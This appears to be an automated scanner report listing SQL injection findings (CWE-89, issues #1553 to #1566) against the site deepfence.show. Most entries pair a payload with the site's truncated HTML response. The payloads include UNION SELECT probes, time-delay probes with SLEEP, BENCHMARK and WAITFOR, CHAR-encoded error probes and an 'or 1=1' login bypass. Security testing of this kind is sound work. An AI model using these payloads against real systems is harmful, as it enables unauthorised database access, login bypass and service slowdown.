type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1553\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\n4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1554\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# waitfor delay '00:00:05'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1555\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' GROUP BY columnnames having 1=\n1 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1556\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# @variable\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1557\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1558\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1559\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1560\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1561\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1562\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1563\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SLEEP(1)/*' or SLEEP(1) or '\" or SLEEP(1) or \"*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1564\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1565\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1566\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or 1=1 or ''='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 